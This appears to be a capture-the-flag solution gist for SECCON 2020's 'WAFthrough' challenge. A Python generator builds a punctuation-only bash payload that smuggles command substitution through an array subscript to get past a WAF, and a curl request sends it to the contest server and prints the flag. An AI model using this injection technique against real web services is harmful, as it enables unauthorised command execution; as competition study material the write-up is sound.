
@st98
Last active April 8, 2021 11:55
SECCON 2020 Online CTF - WAFthrough
# Read a local copy of the CGI script as raw bytes. char_to_v() searches this
# buffer for byte offsets, so the offsets are only meaningful if the local
# copy is byte-identical to the file the server actually runs.
with open('index.cgi', mode='rb') as cgi_source:
    s = cgi_source.read()
# Maps a numeric value to [bash arithmetic expression, shell variable name].
# Every expression and name is built only from punctuation and underscores:
# `$$` is the shell's PID, so `$$-$$` is 0 and `$$/$$` is 1, and each later
# power of two is derived from the variables defined before it.
table = {
    0: ['$$-$$', '__'],
    1: ['$$/$$', '___'],
    2: ['$___+$___', '____'],
    4: ['$____*$____', '_____'],
    8: ['$_____*$____', '______'],
    16: ['$______*$____', '_______'],
    32: ['$_______*$____', '________'],
}

# Prelude of `name=$((expr))` assignments, joined with ';'. The order matters:
# each assignment may reference the variables assigned before it.
assignments = []
for value in (0, 1, 2, 4, 8, 16, 32):
    expression, name = table[value]
    assignments.append(f'{name}=$(({expression}))')
pre = ';'.join(assignments)
def num_to_v(x):
    """Spell the integer *x* as a '+'-joined sum of power-of-two shell variables.

    Each set bit of *x* (bits 0 through 6 are examined) contributes
    ``$<name>``, where ``<name>`` is the variable that ``table`` assigns to
    that power of two. Returns an empty string when none of those bits is set.

    NOTE: ``table`` only defines names for 1 through 32, so a value with
    bit 6 (64) set raises ``KeyError``, and bits above 6 are ignored.
    """
    terms = ['$' + table[1 << bit][1] for bit in range(7) if x & (1 << bit)]
    return '+'.join(terms)
def char_to_v(c):
    """Return a bash substring expansion that evaluates to the single byte *c*.

    The expansion slices the shell variable ``_________`` at the offset where
    *c* first occurs in the module-level buffer ``s``, with a length of
    ``$___`` (1 according to ``table``). The offset is written by num_to_v().

    Raises ``ValueError`` (from ``bytes.index``) when *c* does not occur in
    ``s``.
    """
    offset = s.index(c)
    return '${_________:((I)):(($___))}'.replace('I', num_to_v(offset))
def f(s):
    """Assemble the full query value that spells the byte string *s*.

    The result is ``_[$(...)]``: the ``pre`` assignments, then an assignment
    that loads a file into ``_________`` via ``$(<${!__})``, then one
    char_to_v() expansion per byte of *s*. With ``__`` set to 0 by the
    prelude, ``${!__}`` is an indirect reference to ``$0``, i.e. the running
    script, so the bytes are sliced out of the script's own source.

    NOTE(review): ``_[$(...)]`` has the form of an array subscript, and bash
    runs command substitutions while evaluating a subscript arithmetically.
    How index.cgi consumes ``q`` is not shown here; presumably the value
    reaches an arithmetic context. A handler that accepts only digits before
    any arithmetic use would reject this input.
    """
    go = ''.join(char_to_v(bytes([byte])) for byte in s)
    wrapper = '_[$(PRE;_________=$(<${!__});GO)]'
    return wrapper.replace('PRE', pre).replace('GO', go)
# Generate the query value for the two bytes b'fa' and print its length
# followed by the value itself.
res = f(b'fa')
payload_length = len(res)
print(payload_length, res)
$ curl -g 'http://153.120.168.36/cgi-bin/index.cgi?q=_[$(__=$(($$-$$));___=$(($$/$$));____=$(($___+$___));_____=$(($____*$____));______=$(($_____*$____));_______=$(($______*$____));________=$(($_______*$____));_________=$(<${!__});__________=$(../../???/${_________:(($____+$______+$_______)):(($___))}?${_________:(($______)):(($___))}?);v${__________:$___})]'
...
<div class="container-fluid">
<div class="row">
<div class="ml-3">
<h2>
/usr/lib/cgi-bin/index.cgi: line 52: 2015ECCON{WAF0000000000!}: command not found
</h2>
</div>
</div>
</div>
...